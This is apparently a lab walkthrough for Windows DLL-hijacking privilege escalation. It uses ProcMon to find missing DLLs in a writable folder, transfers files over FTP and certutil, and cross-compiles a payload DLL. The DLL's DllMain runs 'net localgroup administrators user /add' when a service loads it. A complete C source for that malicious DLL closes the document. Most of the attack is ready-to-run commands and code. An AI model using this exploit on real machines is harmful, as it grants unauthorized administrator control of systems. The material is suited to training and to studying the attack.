Check using ProcMon!
In ProcMon, add two filters (Filter > Filter...):
Result - is - NAME NOT FOUND - then Include
click Add
and
Path - ends with - .dll - then Include
click Add
Apply + OK
This leaves only the DLLs that a process tried to load and could not find, i.e. the candidates for hijacking.
We want an entry whose directory our user can write to. Check the folder permissions (e.g. icacls <folder>) rather than assuming: a service's folder under Program Files is a frequent candidate, but it is not always writable.
In this case the Temp folder is writable.
We find this:
We can hijack the DLL in either Program Files (potentially) or Temp (what we did). The DLL we drop must have exactly the name from the NAME NOT FOUND entry (hijackme.dll here).
To change things up:
FTP server on Kali to receive the DLL source in /tmp (port 21 needs root; --write lets the anonymous user upload):
cd /tmp
sudo python3 -m pyftpdlib -p 21 --write
On Windows, open a CMD in the folder that holds windows_dll.c and:
ftp 10.6.62.12
anonymous
anonymous
put windows_dll.c
On Kali in /tmp:
mousepad windows_dll.c
Replace the whoami command in the template with one that adds your user to the local administrators group.
Change user to whatever your actual username is:
system("cmd.exe /k net localgroup administrators user /add");
Exit the editor and build the DLL with the mingw cross-compiler (the service is 64-bit, hence x86_64):
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
Move the DLL to Windows. Serve it from /tmp on Kali (port 80 needs root):
sudo python3 -m http.server 80
Then on Windows fetch it into the Temp folder (or Program Files, wherever you found write access plus NAME NOT FOUND), e.g. from inside that folder:
certutil -urlcache -split -f http://10.6.62.12/hijackme.dll hijackme.dll
The file name must match the missing DLL exactly, or the service will never pick it up.
Stop and start dllsvc so the service process reloads and searches for the DLL again (our user needs start/stop rights on the service for this to work):
sc stop dllsvc
sc start dllsvc
#You can combine these two like:
sc stop dllsvc & sc start dllsvc
If sc start reports a timeout, check the group anyway: cmd.exe /k keeps the shell open inside DllMain, so the start can hang even though the net command has already run.
Check that user is now an admin:
net localgroup administrators
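Added example, not the windows_dll.c template from the page or the room: a complete source file for the DLL built at the compile step above, showing the DllMain / DLL_PROCESS_ATTACH hook around the system() call. The build_payload helper, the TARGET_USER placeholder and the rejection of shell metacharacters in the username are my additions so the command string can be checked on Kali before the DLL is dropped; the DllMain part only compiles under the mingw cross-compiler.

```c
/* hijackme.c - added example (not the page's windows_dll.c).
 * Build on Kali:  x86_64-w64-mingw32-gcc hijackme.c -shared -o hijackme.dll
 * TARGET_USER is a placeholder: set it to your low-privilege username.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

#define TARGET_USER "user"   /* placeholder, replace before building */

static char command_buf[256];

/* Builds the "net localgroup administrators <user> /add" command that the
 * page runs through system(). Kept out of DllMain so it can be unit-tested
 * on the build host. Returns NULL for an empty, oversized or unsafe name
 * (spaces, quotes, &, |, <, >, ^ would change what cmd.exe executes). */
const char *build_payload(const char *user)
{
    size_t n = strlen(user);
    if (n == 0 || n > 64 || strpbrk(user, " \"&|<>^") != NULL)
        return NULL;
    snprintf(command_buf, sizeof command_buf,
             "cmd.exe /k net localgroup administrators %s /add", user);
    return command_buf;
}

#ifdef _WIN32
/* The loader calls this when the service process maps the DLL. Because the
 * service (dllsvc on the page) loads it, the command runs with the service
 * account's privileges, which is what lets it add a user to Administrators.
 * system() does not return until cmd.exe exits; with /k that is when the
 * service start times out, but by then the net command has already run. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;
    if (fdwReason == DLL_PROCESS_ATTACH) {
        const char *cmd = build_payload(TARGET_USER);
        if (cmd != NULL)
            system(cmd);
    }
    return TRUE;
}
#endif
```

The metacharacter check exists because the username is pasted into a cmd.exe command line; a name like "bob&whoami" would run a second command, so the helper refuses it instead of silently building a different payload than the one you intended.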